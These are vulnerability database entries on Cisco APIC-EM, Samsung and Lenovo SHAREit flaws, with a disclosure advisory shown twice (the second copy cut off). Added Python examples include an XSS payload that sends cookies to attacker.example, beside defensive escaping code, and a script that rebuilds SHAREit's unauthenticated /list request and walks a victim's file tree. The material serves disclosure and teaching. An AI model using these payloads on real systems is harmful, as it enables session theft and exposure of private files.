VARIoT IoT vulnerabilities database


VAR-201601-0006 CVE-2015-6337 Cisco Application Policy Infrastructure Controller Enterprise Module cross-site scripting vulnerability
CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in Cisco Application Policy Infrastructure Controller Enterprise Module (APIC-EM) 1.0.10 allows remote attackers to inject arbitrary web script or HTML via a crafted hostname in an SNMP response (Cisco Bug ID CSCuw47238). The payload arrives in data that APIC-EM collects from a polled device rather than in a request from the victim, so the attacker has to supply that SNMP response (from a device under their control, or a spoofed one); the injected script then runs in the browser of any user who views the affected page, in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is tracked by Cisco Bug ID CSCuw47238.
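The pattern behind this entry, device-supplied data rendered into a management page, in an added Python example that is not Cisco's code and not from the page: a hypothetical inventory table row that takes the sysName returned by an SNMP poll and interpolates it into HTML. The unescaped renderer is the shape of the bug; the context-aware renderer is the fix; the hostname syntax check is the input-side control a practitioner would add in front of the inventory store. The SNMP poll itself is replaced by two constructed sysName values, and the row template is invented for the example.

```python
import html
import re
from urllib.parse import quote

# Constructed sample values standing in for the sysName.0 OctetString an SNMP
# poller would receive. SNMP places no character restrictions on sysName, so a
# hostile or spoofed device can return whatever it likes.
BENIGN_SYSNAME = "core-sw-01.example.net"
MALICIOUS_SYSNAME = (
    'sw1"><script>new Image().src="http://attacker.example/?c="'
    "+document.cookie</script>"
)

# Hypothetical inventory row (not APIC-EM's real template, which is not on the
# page). The device name lands in two HTML contexts at once: an attribute value
# and element text.
ROW_TEMPLATE_UNSAFE = '<tr><td><a href="/device?name={name}">{name}</a></td></tr>'


def render_row_unsafe(sysname: str) -> str:
    """Vulnerable pattern: the device-supplied string goes into the page verbatim.

    A double quote in the value closes the href attribute and a < opens a new
    element, so a crafted sysName becomes live markup for every viewer.
    """
    return ROW_TEMPLATE_UNSAFE.format(name=sysname)


def render_row_safe(sysname: str) -> str:
    """Hardened: encode for each output context separately.

    The href gets a percent-encoded query value (nothing with meaning in a URL
    or in HTML survives) and attribute escaping on top; the visible text gets
    HTML entity escaping including quotes.
    """
    href = "/device?name=" + quote(sysname, safe="")
    text = html.escape(sysname, quote=True)
    return f'<tr><td><a href="{html.escape(href, quote=True)}">{text}</a></td></tr>'


# Input-side check: RFC 1123 host name syntax (labels of letters, digits and
# hyphens, no leading or trailing hyphen, whole name at most 253 characters).
# Defence in depth for the inventory store, not a substitute for output
# encoding: a value that fails it should be flagged, never rendered raw.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def is_plausible_hostname(sysname: str) -> bool:
    return _HOSTNAME_RE.match(sysname) is not None


_TAG_OPENER = re.compile(r"<\s*[A-Za-z/!]")


def contains_live_markup(fragment: str) -> bool:
    """True if the rendered row carries more tag openers than the fixed template,
    or an attribute-breaking "><" sequence. A comparison aid for the two
    renderers above, not a sanitizer."""
    if '"><' in fragment:
        return True
    template_openers = len(_TAG_OPENER.findall(ROW_TEMPLATE_UNSAFE))
    return len(_TAG_OPENER.findall(fragment)) > template_openers


if __name__ == "__main__":
    for name in (BENIGN_SYSNAME, MALICIOUS_SYSNAME):
        print("plausible hostname:", is_plausible_hostname(name))
        print("unsafe:", render_row_unsafe(name))
        print("safe:  ", render_row_safe(name))
```

The two renderers differ only in where encoding happens; the point of the hardened one is that a single escaping routine is not enough when the same value is used as both an attribute and as text, and that a syntactic check on the stored hostname catches the crafted value before it is ever rendered.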
VAR-201704-0400 CVE-2016-2036 Samsung SM-N9005 and SM-G920F Android kernel NULL pointer dereference vulnerability
CVSS V2: 2.1
CVSS V3: 5.5
Severity: MEDIUM
The getURL function in drivers/secfilter/urlparser.c in secfilter in the Samsung kernel for Android on SM-N9005 build N9005XXUGBOB6 (Note 3) and SM-G920F build G920FXXU2COH2 (Galaxy S6) devices allows attackers to trigger a NULL pointer dereference via a "GET HTTP/1.1" request, aka SVE-2016-5036. The vendor has published this vulnerability as SVE-2016-5036. The request line "GET HTTP/1.1" has no URL between the method and the HTTP version; that malformed request line is the input the URL parser fails to handle, and an attacker can use it to trigger the NULL pointer dereference. The Samsung Note 3 and Galaxy S6 are smartphones from Samsung (South Korea).
VAR-201601-0462 CVE-2016-1491 Lenovo SHAREit for Windows WiFi hotspot access vulnerability
CVSS V2: 5.4
CVSS V3: 8.8
Severity: HIGH
The Wifi hotspot in Lenovo SHAREit before 3.2.0 for Windows, when configured to receive files, has a hardcoded password of 12345678, which makes it easier for remote attackers to obtain access by leveraging a position within the WLAN coverage area. Lenovo SHAREit is prone to multiple security vulnerabilities. An attacker can exploit these issues to bypass certain security restrictions, gain access to sensitive information, perform man-in-the-middle attacks and bypass the authorization mechanism. Lenovo SHAREit (Eggplant Express) for Windows is file-sharing software from Lenovo (China) for the Windows system. There is a security vulnerability in the Wifi hotspot component of Lenovo SHAREit for Windows versions earlier than 3.2.0. A remote attacker within WLAN coverage could exploit this vulnerability to gain access.

1. Advisory Information
Title: Lenovo ShareIT Multiple Vulnerabilities
Advisory ID: CORE-2016-0002
Advisory URL: http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities
Date published: 2016-01-25
Date of last update: 2016-01-22
Vendors contacted: Lenovo
Release mode: Coordinated release

2. Vulnerability Information
Class: Use of Hard-coded Password [CWE-259], Information Exposure [CWE-200], Missing Encryption of Sensitive Data [CWE-311], Missing Authorization [CWE-862]
Impact: Security bypass, Information leak
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2016-1491, CVE-2016-1490, CVE-2016-1489, CVE-2016-1492

3. Vulnerability Description
SHAREit [1] is a free application from Lenovo [2] that lets you easily share files and folders among smartphones, tablets, and personal computers.

4. Vulnerable Packages
Lenovo SHAREit for Android 3.0.18_ww
Lenovo SHAREit for Windows 2.5.1.1
Other products and versions may also be affected, but they were not tested.

5. Vendor Information, Solutions and Workarounds
Lenovo released updated versions of Lenovo SHAREit for Windows and Android that fix the reported issues. The new versions of the products can be found here [1].

6. Credits
This vulnerability was discovered and researched by Ivan Huertas from Core Security Consulting Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security Advisories Team.

7. Technical Description / Proof of Concept Code

7.1. Hard-coded password in Lenovo SHAREit for Windows [CVE-2016-1491]
When Lenovo SHAREit for Windows is configured to receive files, a Wifi hotspot is set up with an easy password (12345678). Any system with a Wifi network card could connect to that hotspot by using that password. The password is always the same.

7.2. Remote browsing of file system on Lenovo SHAREit for Windows [CVE-2016-1490]
When the WiFi network is on and connected with the default password (12345678), the files can be browsed but not downloaded by performing an HTTP request to the web server launched by Lenovo SHAREit. The following request was used to perform this action:

POST /list?type=file&path=C%3A%5CUsers\admin HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40)
Host: 192.168.173.1:2999
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 0

HTTP/1.0 200 OK
Content-Length: 2426

{"containers":[
{"filepath":"C:\\Users\\admin\\Contacts","has_thumbnail":false,"id":"C:\\Users\\admin\\Contacts","isloaded":false,"isroot":false,"isvolume":false,"name":"Contacts","type":"file","ver":""},
{"filepath":"C:\\Users\\admin\\Desktop","has_thumbnail":false,"id":"C:\\Users\\admin\\Desktop","isloaded":false,"isroot":false,"isvolume":false,"name":"Desktop","type":"file","ver":""},
{"filepath":"C:\\Users\\admin\\Documents","has_thumbnail":false,"id":"C:\\Users\\admin\\Documents","isloaded":false,"isroot":false,"isvolume":false,"name":"Documents","type":"file","ver":""},
{"filepath":"C:\\Users\\admin\\Downloads","has_thumbnail":false,"id":"C:\\Users\\admin\\Downloads","isloaded":false,"isroot":false,"isvolume":false,"name":"Downloads","type":"file","ver":""},
{"filepath":"C:\\Users\\admin\\Favorites","has_thumbnail":false,"id":"C:\\Users\\admin\\Favorites","isloaded":false,"isroot":false,"isvolume":false,"name":"Favorites","type":"file","ver":""},
{"filepath":"C:\\Users\\admin\\Links","has_thumbnail":false,"id":"C:\\Users\\admin\\Links","isloaded":false,"isroot":false,"isvolume":false,"name":"Links","type":"file","ver":""},
{"filepath":"C:\\Users\\admin\\Music","has_thumbnail":false,"id":"C:\\Users\\admin\\Music","isloaded":false,"isroot":false,"isvolume":false,"name":"My Music","type":"file","ver":""},
{"filepath":"C:\\Users\\admin\\Pictures","has_thumbnail":false,"id":"C:\\Users\\admin\\Pictures","isloaded":false,"isroot":false,"isvolume":false,"name":"My Pictures","type":"file","ver":""},
{"filepath":"C:\\Users\\admin\\Saved Games","has_thumbnail":false,"id":"C:\\Users\\admin\\Saved Games","isloaded":false,"isroot":false,"isvolume":false,"name":"Saved Games","type":"file","ver":""},
{"filepath":"C:\\Users\\admin\\Searches","has_thumbnail":false,"id":"C:\\Users\\admin\\Searches","isloaded":false,"isroot":false,"isvolume":false,"name":"Searches","type":"file","ver":""},
{"filepath":"C:\\Users\\admin\\Tracing","has_thumbnail":false,"id":"C:\\Users\\admin\\Tracing","isloaded":false,"isroot":false,"isvolume":false,"name":"Tracing","type":"file","ver":""},
{"filepath":"C:\\Users\\admin\\Videos","has_thumbnail":false,"id":"C:\\Users\\admin\\Videos","isloaded":false,"isroot":false,"isvolume":false,"name":"My ","type":"file","ver":""}
],"filepath":"C:\\Users\\admin","has_thumbnail":false,"id":"C:\\Users\\admin","isloaded":true,"isroot":false,"isvolume":false,"name":"admin","type":"file","ver":""}

7.3. Files transferred in plain text in Windows and Android version of Lenovo SHAREit [CVE-2016-1489]
The files are transferred via HTTP without encryption. An attacker who is able to sniff the network traffic could view the data transferred or perform man-in-the-middle attacks, for example by modifying the content of the transferred files.

7.4. Open WiFi Network defined on Android devices [CVE-2016-1492]
When the application is configured to receive files, an open Wifi hotspot is created without any password. An attacker could connect to that hotspot and capture the information transferred between those devices.

8. Report Timeline
2015-10-29: Core Security sent an initial notification to Lenovo.
2015-10-29: Lenovo replied attaching their public PGP key.
2015-10-29: Core Security sent Lenovo a draft version of the advisory and requested a tentative day for the release of the patched version.
2015-10-29: Lenovo replied that their development team would review Core Security's findings.
2015-11-06: Lenovo informed that they would like to discuss their progress in a telephone meeting.
2015-11-06: Core Security replied to Lenovo that it is our policy not to have such communications, in order to always keep a log of all interactions with the vendor.
2015-11-06: Lenovo replied that they understood Core Security's policy and asked if the first disclosure date was negotiable.
2015-11-06: Core Security replied to Lenovo that the date was negotiable, the priority being to make a coordinated release.
2015-11-13: Lenovo informed Core Security that they had addressed the Windows version issues and could share a beta fix for us to validate. They informed as well that the development team would continue to investigate the Android version issues.
2015-11-20: Lenovo asked Core Security for feedback regarding their beta fix.
2015-11-20: Core Security replied saying there was a small delay in the review of the beta fix and informed Lenovo they would send a reply the next week.
2015-11-20: Lenovo asked Core Security to confirm that the publication date of the advisory was not going to be November 30, and asked to seek an agreement regarding a specific date.
2015-11-23: Core Security replied stating that they were not going to publish their findings on November 30, and that the idea was to coordinate a schedule according to the release date of the corrected versions. Additionally, Core Security informed Lenovo regarding the beta fix, which was still using the hardcoded password.
2015-11-23: Lenovo informed Core Security that they had forwarded Core's analysis to their development team.
2015-11-25: Lenovo informed Core Security that they considered that issue resolved, considering that the hardcoded password was not present in the "secure mode" and only used in the "easy mode".
2015-12-06: Lenovo informed Core Security that they were still working on the schedule.
2015-12-07: Lenovo informed Core Security that they were targeting to release the updated Windows version on January 10 and that they would continue working with their third-party partner for the Android version release.
2016-01-04: Core Security asked Lenovo if the publication date could be moved from Sunday, January 10 to Monday, January 11.
2016-01-04: Lenovo asked Core Security for more specific justifications for not releasing on a Sunday.
2016-01-05: Core Security informed Lenovo that it is always recommended to publish on a working day in order to give enough time to the affected users to update their products (particularly corporate users) and avoid exploitation of the published flaws by malicious users over the weekend.
2016-01-05: Lenovo informed Core Security that they agreed to publish on Monday, January 11 but that they hadn't planned a date for their advisory disclosure.
2016-01-05: Core Security informed Lenovo that our advisory would be published the same day as the release of the new version.
2016-01-05: Lenovo informed Core Security that they would publish their advisory concurrently with Core's advisory. Lenovo requested a draft version of the advisory in order to ensure consistency among publications. They asked how Core would like to be acknowledged in their advisory and offered additional publication dates in case they couldn't meet the Monday, January 11 deadline.
2016-01-05: Core Security informed Lenovo that the additional publication dates are acceptable if Core is informed of such changes in time. We informed them that we would send a draft of the advisory once it was completed and sent them the acknowledgment line as requested.
2016-01-06: Core Security sent Lenovo the draft version of the advisory.
2016-01-08: Lenovo informed Core Security that, because they had discovered additional vulnerabilities, they requested to address both platforms' issues together. Additionally, they requested an extension of the publication date to mid-February and the possibility to keep updating Lenovo SHAREit.
2016-01-08: Core Security informed Lenovo that it was our first request to address all vulnerabilities in one advisory. Additionally, we requested to know which vulnerabilities they were planning to address, and whether those included any of the ones reported by us. We expressed our willingness to extend the deadline even though the maximum 3-month period we define was already over.
2016-01-08: Lenovo informed Core Security that they intended to address all the vulnerabilities reported by us and requested confirmation on extending the date of our joint disclosure to mid-February.
2016-01-08: Core Security informed Lenovo that we wanted to know in advance exactly when each vulnerability was going to be addressed, in order to agree to extend the date of our joint disclosure.
2016-01-08: Lenovo informed Core Security that they agreed to our terms.
2016-01-14: Lenovo informed Core Security that they were going to publish the new versions for both platforms addressing all the reported vulnerabilities on January 15 and expected to release the joint disclosure in mid-February.
2016-01-14: Core Security informed Lenovo that it is our policy to disclose our findings once the new version correcting the issues becomes available. We informed them that if that was going to happen the following day, we would be forced to publish our security advisory the following day as well.
2016-01-15: Lenovo informed Core Security that they had misunderstood our disclosure policy. They informed us that they would probably be publishing the following week and no later than January 22.
2016-01-15: Core Security informed Lenovo that we committed to a joint security disclosure the day the software releases went live and requested advance notice as soon as they could give it.
2016-01-19: Lenovo informed Core Security that they agreed to our request.
2016-01-20: Core Security informed Lenovo that they would be publishing both versions on Friday, January 22.
2016-01-20: Core Security requested Lenovo to release the updates on Monday, January 25, as recommended before, in order to give the affected users enough working days to download and install the new version.
2016-01-21: Lenovo informed Core Security that they agreed to release on Monday, January 25. They also informed that they would be publishing their security advisory as well.
2016-01-25: Advisory CORE-2016-0002 published.

9. References
[1] http://shareit.lenovo.com/#DOWNLOAD
[2] http://www.lenovo.com

10. About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

12. Disclaimer
The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
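Section 7.2 of the advisory above shows a single /list request and its response. The following Python is an added example, not part of Core Security's advisory and not Lenovo's code: it rebuilds that request byte for byte, parses the response schema visible in the capture, and walks the exposed tree recursively to show what an unauthenticated client on the hotspot can enumerate. There is no live SHAREit server here, so the server side is a constructed in-memory stand-in (fake_shareit_list over FAKE_TREE, both invented) that answers in the same JSON shape; the host, port, headers and response layout come from the advisory, the enumeration logic and the sample tree are the hypothetical part.

```python
import json
from typing import Callable, Dict, List
from urllib.parse import quote

# Host and port from the captured request in section 7.2 of the advisory.
SHAREIT_HOST = "192.168.173.1:2999"


def build_list_request(path: str, host: str = SHAREIT_HOST) -> bytes:
    """Rebuild the unauthenticated directory-listing request from the advisory.

    The capture sends the Windows path in the query string of a POST with an
    empty body; everything else is the client's default headers.
    """
    query = "/list?type=file&path=" + quote(path, safe="")
    lines = [
        f"POST {query} HTTP/1.1",
        "Content-Type: application/x-www-form-urlencoded",
        "User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40)",
        f"Host: {host}",
        "Connection: Keep-Alive",
        "Accept-Encoding: gzip",
        "Content-Length: 0",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def parse_list_response(body: str) -> List[Dict[str, str]]:
    """Extract name, filepath and type from a /list JSON body.

    In the advisory's capture every entry, directories included, is reported as
    type "file" with isloaded=false, so the listing alone does not say which
    entries can be descended into.
    """
    doc = json.loads(body)
    return [
        {"name": c["name"], "filepath": c["filepath"], "type": c["type"]}
        for c in doc.get("containers", [])
    ]


# Excerpt of the response body shown in the advisory (first two entries only).
ADVISORY_SAMPLE = (
    r'{"containers":[{"filepath":"C:\\Users\\admin\\Contacts","has_thumbnail":false,'
    r'"id":"C:\\Users\\admin\\Contacts","isloaded":false,"isroot":false,"isvolume":false,'
    r'"name":"Contacts","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Desktop",'
    r'"has_thumbnail":false,"id":"C:\\Users\\admin\\Desktop","isloaded":false,"isroot":false,'
    r'"isvolume":false,"name":"Desktop","type":"file","ver":""}],"filepath":"C:\\Users\\admin",'
    r'"has_thumbnail":false,"id":"C:\\Users\\admin","isloaded":true,"isroot":false,'
    r'"isvolume":false,"name":"admin","type":"file","ver":""}'
)

# Constructed directory tree standing in for a victim's machine: keys are the
# paths the server is asked about, values the names it would list for them.
FAKE_TREE = {
    "C:\\Users\\admin": ["Desktop", "Documents", "secrets.txt"],
    "C:\\Users\\admin\\Desktop": ["notes.txt"],
    "C:\\Users\\admin\\Documents": ["tax-2015.pdf", "Private"],
    "C:\\Users\\admin\\Documents\\Private": ["passwords.xlsx"],
}


def fake_shareit_list(path: str) -> str:
    """Offline stand-in for the SHAREit web server's /list handler, answering in
    the JSON shape of the advisory's capture (every entry typed "file")."""
    containers = []
    for name in FAKE_TREE.get(path, []):
        child = path + "\\" + name
        containers.append({
            "filepath": child, "has_thumbnail": False, "id": child, "isloaded": False,
            "isroot": False, "isvolume": False, "name": name, "type": "file", "ver": "",
        })
    return json.dumps({
        "containers": containers, "filepath": path, "has_thumbnail": False, "id": path,
        "isloaded": True, "isroot": False, "isvolume": False,
        "name": path.rsplit("\\", 1)[-1], "type": "file", "ver": "",
    })


def enumerate_tree(root: str, fetch: Callable[[str], str], max_depth: int = 8) -> List[str]:
    """Walk the exposed file system from root, depth first.

    Because the schema does not mark directories, every entry is queried in
    turn; plain files simply come back with an empty container list. max_depth
    bounds the walk on junctions or very deep trees.
    """
    found: List[str] = []

    def walk(path: str, depth: int) -> None:
        if depth > max_depth:
            return
        for entry in parse_list_response(fetch(path)):
            found.append(entry["filepath"])
            walk(entry["filepath"], depth + 1)

    walk(root, 0)
    return found


if __name__ == "__main__":
    print(build_list_request("C:\\Users\\admin").decode())
    for p in enumerate_tree("C:\\Users\\admin", fake_shareit_list):
        print(p)
```

Against a real instance, fetch would send build_list_request() over a TCP socket to 192.168.173.1:2999 and return everything after the blank line; the capture shows the server answering as HTTP/1.0 with a Content-Length, so reading until the connection closes is enough. The walker's one consequence of the schema is worth noting for triage: since directories and files are both reported as type "file", the only way to tell them apart is to query each one, which also means the full tree, not just one directory, is what the missing authorization check exposes.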
VAR-201601-0463 CVE-2016-1492 Lenovo SHAREit for Android WiFi hotspot access vulnerability
CVSS V2: 2.9
CVSS V3: 6.1
Severity: MEDIUM
The Wifi hotspot in Lenovo SHAREit before 3.5.48_ww for Android, when configured to receive files, does not require a password, which makes it easier for remote attackers to obtain access by leveraging a position within the WLAN coverage area. Supplementary information: the vulnerability type has been identified as CWE-284: Improper Access Control (http://cwe.mitre.org/data/definitions/284.html). A third party within wireless LAN (WLAN) range may obtain access. Lenovo SHAREit is prone to multiple security vulnerabilities. An attacker can exploit these issues to bypass certain security restrictions, gain access to sensitive information, perform man-in-the-middle attacks and bypass the authorization mechanism. Lenovo SHAREit (Eggplant Express) for Android is file-sharing software from Lenovo (China) for the Android system. There is a security vulnerability in the Wifi hotspot component of Lenovo SHAREit for Android versions earlier than 3.5.48_ww: the hotspot the program creates to receive files is open, with no password at all. This issue is section 7.4 (Open WiFi Network defined on Android devices) of Core Security advisory CORE-2016-0002, which is reproduced in full under VAR-201601-0462 (CVE-2016-1491) above; the advisory covers the Windows hard-coded password, the unauthenticated /list file browsing, the plaintext file transfer and this open hotspot together.
VAR-201601-0461 CVE-2016-1490 Windows Edition Lenovo SHAREit of WiFi Vulnerability in obtaining important file names in hotspots CVSS V2: 2.7
CVSS V3: 4.1
Severity: MEDIUM
The Wifi hotspot in Lenovo SHAREit before 3.2.0 for Windows allows remote attackers to obtain sensitive file names via a crafted file request to /list. Lenovo SHAREit is prone to multiple security vulnerabilities. An attacker can exploit these issues to bypass certain security restrictions, gain access to sensitive information, perform man-in-the-middle attacks and bypass the authorization mechanism. Lenovo SHAREit (Eggplant Express) for Windows is a file-sharing application for Windows systems from China's Lenovo. The Wifi hotspot component of Lenovo SHAREit for Windows versions earlier than 3.2.0 is affected.

1. Advisory Information
Title: Lenovo ShareIT Multiple Vulnerabilities
Advisory ID: CORE-2016-0002
Advisory URL: http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities
Date published: 2016-01-25
Date of last update: 2016-01-22
Vendors contacted: Lenovo
Release mode: Coordinated release

2. Vulnerability Information
Class: Use of Hard-coded Password [CWE-259], Information Exposure [CWE-200], Missing Encryption of Sensitive Data [CWE-311], Missing Authorization [CWE-862]
Impact: Security bypass, Information leak
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2016-1491, CVE-2016-1490, CVE-2016-1489, CVE-2016-1492

3. Vulnerability Description
SHAREit [1] is a free application from Lenovo [2] that lets you easily share files and folders among smartphones, tablets, and personal computers.

4. Vulnerable Packages
Lenovo SHAREit for Android 3.0.18_ww
Lenovo SHAREit for Windows 2.5.1.1
Other products and versions may also be affected, but they were not tested.

5. Vendor Information, Solutions and Workarounds
Lenovo released updated versions of Lenovo SHAREit for Windows and Android that fix the reported issues. The new versions of the products can be found here [1].

6. Credits
This vulnerability was discovered and researched by Ivan Huertas from Core Security Consulting Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security Advisories Team.

7. Technical Description / Proof of Concept Code

7.1. Hard-coded password in Lenovo SHAREit for Windows [CVE-2016-1491]
When Lenovo SHAREit for Windows is configured to receive files, a Wifi hotspot is set up with an easy password (12345678). Any system with a Wifi network card can connect to that hotspot using that password. The password is always the same.

7.2. Remote browsing of file system on Lenovo SHAREit for Windows [CVE-2016-1490]
When the Wifi network is on and a client has connected with the default password (12345678), the files can be browsed, but not downloaded, by performing an HTTP request to the web server launched by Lenovo SHAREit. The following request was used to perform this action:

POST /list?type=file&path=C%3A%5CUsers\admin HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40)
Host: 192.168.173.1:2999
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 0

HTTP/1.0 200 OK
Content-Length: 2426

{"containers":[{"filepath":"C:\\Users\\admin\\Contacts","has_thumbnail":false,"id":"C:\\Users\\admin\\Contacts","isloaded":false,"isroot":false,"isvolume":false,"name":"Contacts","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Desktop","has_thumbnail":false,"id":"C:\\Users\\admin\\Desktop","isloaded":false,"isroot":false,"isvolume":false,"name":"Desktop","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Documents","has_thumbnail":false,"id":"C:\\Users\\admin\\Documents","isloaded":false,"isroot":false,"isvolume":false,"name":"Documents","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Downloads","has_thumbnail":false,"id":"C:\\Users\\admin\\Downloads","isloaded":false,"isroot":false,"isvolume":false,"name":"Downloads","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Favorites","has_thumbnail":false,"id":"C:\\Users\\admin\\Favorites","isloaded":false,"isroot":false,"isvolume":false,"name":"Favorites","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Links","has_thumbnail":false,"id":"C:\\Users\\admin\\Links","isloaded":false,"isroot":false,"isvolume":false,"name":"Links","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Music","has_thumbnail":false,"id":"C:\\Users\\admin\\Music","isloaded":false,"isroot":false,"isvolume":false,"name":"My Music","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Pictures","has_thumbnail":false,"id":"C:\\Users\\admin\\Pictures","isloaded":false,"isroot":false,"isvolume":false,"name":"My Pictures","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Saved Games","has_thumbnail":false,"id":"C:\\Users\\admin\\Saved Games","isloaded":false,"isroot":false,"isvolume":false,"name":"Saved Games","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Searches","has_thumbnail":false,"id":"C:\\Users\\admin\\Searches","isloaded":false,"isroot":false,"isvolume":false,"name":"Searches","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Tracing","has_thumbnail":false,"id":"C:\\Users\\admin\\Tracing","isloaded":false,"isroot":false,"isvolume":false,"name":"Tracing","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Videos","has_thumbnail":false,"id":"C:\\Users\\admin\\Videos","isloaded":false,"isroot":false,"isvolume":false,"name":"My ","type":"file","ver":""}],"filepath":"C:\\Users\\admin","has_thumbnail":false,"id":"C:\\Users\\admin","isloaded":true,"isroot":false,"isvolume":false,"name":"admin","type":"file","ver":""}

7.3. Files transferred in plain text in Windows and Android versions of Lenovo SHAREit [CVE-2016-1489]
The files are transferred via HTTP without encryption. An attacker who is able to sniff the network traffic could view the data transferred or perform man-in-the-middle attacks, for example by modifying the content of the transferred files.

7.4. Open Wifi network defined on Android devices [CVE-2016-1492]
When the application is configured to receive files, an open Wifi hotspot is created without any password. An attacker could connect to that hotspot and capture the information transferred between those devices.

8. Report Timeline
2015-10-29: Core Security sent an initial notification to Lenovo.
2015-10-29: Lenovo replied attaching their public PGP key.
2015-10-29: Core Security sent Lenovo a draft version of the advisory and requested a tentative day for the release of the patched version.
2015-10-29: Lenovo replied that their development team would review Core Security's findings.
2015-11-06: Lenovo informed that they would like to discuss their progress in a telephone meeting.
2015-11-06: Core Security replied to Lenovo that it is our policy not to have such communications, in order to always keep a log of all interactions with the vendor.
2015-11-06: Lenovo replied that they understood Core Security's policy and asked if the first disclosure date was negotiable.
2015-11-06: Core Security replied to Lenovo that the date was negotiable, the priority being to make a coordinated release.
2015-11-13: Lenovo informed Core Security that they had addressed the Windows version issues and could share a beta fix for us to validate. They informed as well that the development team would continue to investigate the Android version issues.
2015-11-20: Lenovo asked Core Security for feedback regarding their beta fix.
2015-11-20: Core Security replied saying there was a small delay in the review of the beta fix and informed Lenovo they would send a reply the next week.
2015-11-20: Lenovo asked Core Security to confirm that the publication date of the advisory was not going to be November 30, and asked to seek an agreement regarding a specific date.
2015-11-23: Core Security replied stating that they were not going to publish their findings on November 30, and that the idea was to coordinate a schedule according to the release date of the corrected versions. Additionally, Core Security informed Lenovo regarding the beta fix, which was still using the hardcoded password.
2015-11-23: Lenovo informed Core Security that they had forwarded Core's analysis to their development team.
2015-11-25: Lenovo informed Core Security that they considered that issue resolved, since the hardcoded password was not present in the "secure mode" and was only used in the "easy mode".
2015-12-06: Lenovo informed Core Security that they were still working on the schedule.
2015-12-07: Lenovo informed Core Security that they were targeting to release the updated Windows version on January 10 and that they would continue working with their third-party partner for the Android version release.
2016-01-04: Core Security asked Lenovo if the publication date could be moved from Sunday, January 10 to Monday, January 11.
2016-01-04: Lenovo asked Core Security for more specific justifications for not releasing on a Sunday.
2016-01-05: Core Security informed Lenovo that it is always recommended to publish on a working day in order to give the affected users (particularly corporate users) enough time to update their products and to avoid exploitation of the published flaws by malicious users over the weekend.
2016-01-05: Lenovo informed Core Security that they agreed to publish on Monday, January 11, but that they hadn't planned a date for their advisory disclosure.
2016-01-05: Core Security informed Lenovo that our advisory would be published the same day as the release of the new version.
2016-01-05: Lenovo informed Core Security that they would publish their advisory concurrently with Core's advisory. Lenovo requested a draft version of the advisory in order to ensure consistency among publications. They asked how Core would like to be acknowledged in their advisory and offered additional publication dates in case they couldn't meet the Monday, January 11 deadline.
2016-01-05: Core Security informed Lenovo that the additional publication dates were acceptable if Core was informed of such changes in time. We informed them that we would send a draft of the advisory once it was completed, and sent them the acknowledgment line as requested.
2016-01-06: Core Security sent Lenovo the draft version of the advisory.
2016-01-08: Lenovo informed Core Security that, because they had discovered additional vulnerabilities, they requested to address the issues of both platforms together. Additionally they requested an extension of the publication date to mid-February and the possibility to keep updating Lenovo SHAREit.
2016-01-08: Core Security informed Lenovo that it was our first request to address all vulnerabilities in one advisory. Additionally, we requested to know which vulnerabilities they were planning to address, and whether those included any of the ones reported by us. We expressed our willingness to extend the deadline even though the maximum 3-month period we define was already over.
2016-01-08: Lenovo informed Core Security that they intended to address all the vulnerabilities reported by us and requested confirmation on extending the date of our joint disclosure to mid-February.
2016-01-08: Core Security informed Lenovo that we wanted to know in advance exactly when each vulnerability was going to be addressed in order to agree to extend the date of our joint disclosure.
2016-01-08: Lenovo informed Core Security that they agreed to our terms.
